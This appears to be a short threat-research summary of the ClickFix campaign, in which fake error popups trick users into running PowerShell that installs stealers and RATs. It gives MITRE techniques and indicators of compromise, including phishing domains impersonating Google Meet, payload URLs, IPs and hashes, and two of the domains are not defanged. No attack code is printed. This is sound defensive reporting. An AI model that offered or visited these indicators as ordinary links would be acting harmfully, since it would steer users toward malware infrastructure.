Threat Research

ClickFix Strategy: The Phantom Gathering

Securonix

ClickFix is a 2024-era social engineering tactic that uses fake error popups to trick users into executing malicious PowerShell code, enabling malware distribution on Windows and macOS. The campaigns tie to TA571 and groups such as Slavic Nation Empire (SNE) and Scamquerteo, targeting cryptocurrency/Web3 ecosystems while attempting to bypass antivirus and browser security.
#ClickFix #TA571 #SNE #Scamquerteo #GoogleMeet #Matanbuchus #AMOSStealer #Stealc

Keypoints

  • ClickFix emerged in 2024 as a new social engineering tactic using fake error messages to prompt PowerShell-based execution.
  • It leverages phishing lures (HTML files masquerading as Word docs) to deliver malware.
  • TA571 has employed ClickFix in email campaigns since March 2024 to distribute payloads.
  • Malware families distributed include Matanbuchus, DarkGate, NetSupport RAT, and infostealers for Windows and macOS.
  • Campaigns impersonate legitimate services (e.g., Google Meet) to deceive victims and evade defenses.
  • Threat actors and clusters linked to this tactic include Slavic Nation Empire (SNE) and Scamquerteo, connected to Marko Polo and CryptoLove networks.
  • The ClickFix cluster uses centralized infrastructure and Telegram bots to monitor compromises and coordinate operations.
  • Campaigns show a focus on cryptocurrency/Web3 users, but the technique could generalize to other sectors.

MITRE Techniques

  • [T1059.001] PowerShell – Malicious PowerShell code execution via user interaction with fake error messages. ‘Malicious PowerShell code execution via user interaction with fake error messages.’
  • [T1566.001] Phishing – Phishing emails containing HTML files disguised as Word documents. ‘Phishing emails containing HTML files disguised as Word documents.’
  • [T1071.001] Web Protocols – Communication with C2 servers for malware payload delivery and data exfiltration. ‘Communication with C2 servers for malware payload delivery and data exfiltration.’
  • [T1003] Credential Dumping – Use of infostealers to gather sensitive information from victims. ‘Use of infostealers to gather sensitive information from victims.’
  • [T1210] Exploitation of Remote Services – Exploitation of vulnerabilities in remote services to deliver malware. ‘Exploitation of vulnerabilities in remote services to deliver malware.’

Indicators of Compromise

  • [Domain] – meet.google.us-join.com, googiedrivers.com (phishing domains impersonating Google Meet)
  • [IP Address] – 77.221.157.170, 95.182.97.58
  • [URL] – hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj, hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh
  • [SHA256] – 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138, 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 (and 2 more hashes)
  • [File Name] – fix-error, Launcher_v1.94.dmg
  • [URL] – hxxps://googiedrivers[.]com/fix-error, hxxps://carolinejuskus[.]com/kusaka.php?call=launcher

Read more: https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint